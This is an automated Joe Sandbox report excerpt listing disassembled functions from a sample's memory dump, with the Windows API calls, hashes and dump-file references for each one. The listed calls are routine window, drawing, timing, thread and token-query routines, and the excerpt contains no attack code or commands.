Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a400d0b0096e54cf6f37c6de41e2845879c5adb561e4bf8e0dd0cb0ab9fa6613
Instruction ID: e2c2e750230e9a84964f33f912890b37846fcdd8f513382660a4377faa44ab0b
Opcode Fuzzy Hash: a400d0b0096e54cf6f37c6de41e2845879c5adb561e4bf8e0dd0cb0ab9fa6613
Instruction Fuzzy Hash: 6E414A3150421AFFDF159F64C884AEABBB4FB49331F14422AFC6A96290C730A954DFB0

Function 00D7C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00D7C156
PostMessageW.USER32(?,00000201,00000001), ref: 00D7C200
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D7C208
PostMessageW.USER32(?,00000202,00000000), ref: 00D7C216
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D7C21E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: a88e3d10293a3800a71dba1b5c5f155c0a9f181e6cf92279c7435bd47d676109
Instruction ID: 8ed261c36e67989fb3f12956cfbcd41cec493214fce8bfc403c885bb77e6770f
Opcode Fuzzy Hash: a88e3d10293a3800a71dba1b5c5f155c0a9f181e6cf92279c7435bd47d676109
Instruction Fuzzy Hash: C631BF7190031AEFDB04CFA8DD4CA9E3BB6EB04315F108228F824EA2D1D7B09904CBA0

Function 00D7E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00D7E9CD
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D7E9EA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D7EA22
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D7EA48
_wcsstr.LIBCMT ref: 00D7EA52

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 58b0ea6aa5b7d68a8ca0f9a4a79bcbc9ba930d6644587c97012900393da22e9d
Instruction ID: ec79f755f23ed9549dca3aa7a6cfd4b1d711a402834d9115aa4176aaf4073953
Opcode Fuzzy Hash: 58b0ea6aa5b7d68a8ca0f9a4a79bcbc9ba930d6644587c97012900393da22e9d
Instruction Fuzzy Hash: DE213132204215BBEB159B69DC49E7BBFA9EF4A750F04C07AF80DCA191FA70DD4086B0

Function 00DADC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

GetWindowLongW.USER32(?,000000F0), ref: 00DADCC0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DADCE4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DADCFC
GetSystemMetrics.USER32(00000004), ref: 00DADD24
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00D9407D,00000000), ref: 00DADD42

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 027e8a52c26878985bf1f5f84d46d3613d47a488986302c9f0daaac260565fc3
Instruction ID: be395a3dbf9c2ff7c9cf2395b5f620a2a3931d19b4e8d1be2fdd1823bcb12eea
Opcode Fuzzy Hash: 027e8a52c26878985bf1f5f84d46d3613d47a488986302c9f0daaac260565fc3
Instruction Fuzzy Hash: 4D219A71604312AFCF245F798C48B6A37A6BB4A365B144B34F927DAAE0D770D850CAB0

Function 00D7CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D7CA86

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D7CAB8
__itow.LIBCMT ref: 00D7CAD0
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D7CAF6
__itow.LIBCMT ref: 00D7CB07

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 85448064590347d305c984ba15183ca4a1880e27a251f1526af0c904be49c8a5
Instruction ID: ef8507a4b16b143cb4273f269e45696f9e208fd6f1e39d872bd737ffa5f92673
Opcode Fuzzy Hash: 85448064590347d305c984ba15183ca4a1880e27a251f1526af0c904be49c8a5
Instruction Fuzzy Hash: C821A4726407087FDB21EAA48C47EDE7A69EF5D710F059029F909E7281E6708D0587B0

Function 00D989AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00D989CE
GetForegroundWindow.USER32 ref: 00D989E5
GetDC.USER32(00000000), ref: 00D98A21
GetPixel.GDI32(00000000,?,00000003), ref: 00D98A2D
ReleaseDC.USER32(00000000,00000003), ref: 00D98A68

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: b58139e1f84ca82c52651dbf7b0aa93e356235f7948b2376f88c595c8c334847
Instruction ID: 6ac2075ce97d05c574d0a043f8fc781b7a9f056c9c63df4184f7ea0ebff6d542
Opcode Fuzzy Hash: b58139e1f84ca82c52651dbf7b0aa93e356235f7948b2376f88c595c8c334847
Instruction Fuzzy Hash: DC218E75A00205AFDB00EF65CC89EAABBF5EF49715B048479E94AD7352DB70AD00CBB0

Function 00D5B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D5B5EB
SelectObject.GDI32(?,00000000), ref: 00D5B5FA
BeginPath.GDI32(?), ref: 00D5B611
SelectObject.GDI32(?,00000000), ref: 00D5B63B

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: a433fc2fc41b03045da4bfa09b7a78e3834637f1d941cf4f82845d0d88842278
Instruction ID: e0f77ea04889eee9912dc2f8caf04ee8d36aaec89530208ef8ce292bdf8e14d6
Opcode Fuzzy Hash: a433fc2fc41b03045da4bfa09b7a78e3834637f1d941cf4f82845d0d88842278
Instruction Fuzzy Hash: EA214F70800306EFDF149F16DC44BA97BE9FB10326F18816AFC55AA1A0D3729AD98B74

Function 00D62E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00D62E81
CreateThread.KERNEL32(?,?,00D62FB7,00000000,?,?), ref: 00D62EC5
GetLastError.KERNEL32 ref: 00D62ECF
_free.LIBCMT ref: 00D62ED8
__dosmaperr.LIBCMT ref: 00D62EE3

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 92a3d55b90c86ca0637cfac1c0d1e15eb8400694fea0e784ad2153b49e31f525
Instruction ID: 192e8ae780e9bf69f5b0fccdeb138edcf1001abd97a4d91338ac536e4ab0691a
Opcode Fuzzy Hash: 92a3d55b90c86ca0637cfac1c0d1e15eb8400694fea0e784ad2153b49e31f525
Instruction Fuzzy Hash: 75116132104B06AFDB21AFA9EC41DBB7BA9EF45770B140539FA54C6192EB32D8019771

Function 00D7B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00D7B903
GetLastError.KERNEL32(?,00D7B3CB,?,?,?), ref: 00D7B90D
GetProcessHeap.KERNEL32(00000008,?,?,00D7B3CB,?,?,?), ref: 00D7B91C
RtlAllocateHeap.NTDLL(00000000,?,00D7B3CB), ref: 00D7B923
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00D7B93A

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 1e43bb98b52f1e4cbf1d3050e33cfe2e9e5ab5187dfd52b4c0fff03a0897900f
Instruction ID: 42165d8e447161ba968f654393aade6cc7c0b795f6a5d48d8019f0355eed91a2
Opcode Fuzzy Hash: 1e43bb98b52f1e4cbf1d3050e33cfe2e9e5ab5187dfd52b4c0fff03a0897900f
Instruction Fuzzy Hash: C1016D7120130ABFDB114FA5DC88E6B7BAEEF8A764B14402AFA49C2250DB71DC41DA70

Function 00D88355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D88371
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00D8837F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D88387
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00D88391
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D883CD

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 51cdf4a47d6961a2a232f3f7691c930ab630b6aaca6e638b4ed42158ee41e1c2
Instruction ID: c1918786d4813b23af9b78c8c180c6db5a351d4c2726f1e6113cc78c5a8e74cb
Opcode Fuzzy Hash: 51cdf4a47d6961a2a232f3f7691c930ab630b6aaca6e638b4ed42158ee41e1c2
Instruction Fuzzy Hash: 70011735D0071AEBDF00ABA5ED48AEEBB79FB08B01F450055E542F2250DB7095509BB1

Function 00D7A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 00D7A874
ProgIDFromCLSID.COMBASE(?,00000000), ref: 00D7A88F
lstrcmpiW.KERNEL32(?,00000000), ref: 00D7A89D
CoTaskMemFree.COMBASE(00000000), ref: 00D7A8AD
CLSIDFromString.COMBASE(?,?), ref: 00D7A8B9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 04b740fa075e594eb090733218d07021ad4708e09a4886febf9afa2695f92e86
Instruction ID: 757c7f0f475ae1252cbeca3d0f63d4a2356c1db6f0b8956074ba7a53ae7392ab
Opcode Fuzzy Hash: 04b740fa075e594eb090733218d07021ad4708e09a4886febf9afa2695f92e86
Instruction Fuzzy Hash: 60018F76600206AFDB114F58DC44B9EBBAEEF84351F158036F905D2210E770DD419BB2

Function 00D7B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D7B806
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B810
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B81F
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00D7B826
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D7B83C

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: da6fd0eda4942b9f474e2cba00a0459dcca574669fbaa1e13d9a53d261ae29c4
Instruction ID: 2c65c2dd656e630b3484e36dfed05fad5647546411d4b4bdcb48b5eb9d05f7ff
Opcode Fuzzy Hash: da6fd0eda4942b9f474e2cba00a0459dcca574669fbaa1e13d9a53d261ae29c4
Instruction Fuzzy Hash: A8F04975200306AFEB211FA5EC88F6B3B6EFF4A764F04402AF945C7250DB609842DA71

Function 00D7B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D7B7A5
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D7B7AF
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D7B7BE
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00D7B7C5
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D7B7DB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 08fd6b5783f92e90b9868c227cf62f3135d50b07a854757a77e53e4277eb34a7
Instruction ID: 879270793c2268f14da045eaeb493755f5d7b49fe5ae652900c22a96b6451931
Opcode Fuzzy Hash: 08fd6b5783f92e90b9868c227cf62f3135d50b07a854757a77e53e4277eb34a7
Instruction Fuzzy Hash: 53F04F712403466FEB101FA5AC89F673BADFF86765F14402AF945C7250DB609C429A70

Function 00D7FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00D7FA8F
GetWindowTextW.USER32(00000000,?,00000100), ref: 00D7FAA6
MessageBeep.USER32(00000000), ref: 00D7FABE
KillTimer.USER32(?,0000040A), ref: 00D7FADA
EndDialog.USER32(?,00000001), ref: 00D7FAF4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: a5a6c45bb39e11ebc114204615a24d8e0d5004c35f60e99e3b3ffcc8cfe03012
Instruction ID: 41f04a8c33f0458b6a2bb939c0a1e9375d8dbcb066b1693c5b99a146cd6349ed
Opcode Fuzzy Hash: a5a6c45bb39e11ebc114204615a24d8e0d5004c35f60e99e3b3ffcc8cfe03012
Instruction Fuzzy Hash: DF018130500706ABEB319B10DD4EF9677B9BB00B09F04427AB18BA55E0EBF0A944CA60

Function 00D5B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00D5B526
StrokeAndFillPath.GDI32(?,?,00DBF583,00000000,?), ref: 00D5B542
SelectObject.GDI32(?,00000000), ref: 00D5B555
DeleteObject.GDI32 ref: 00D5B568
StrokePath.GDI32(?), ref: 00D5B583

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: ee8296cd58475ae58c9e05050c81e1358f145caf14b03f8bc929a3882d73084f
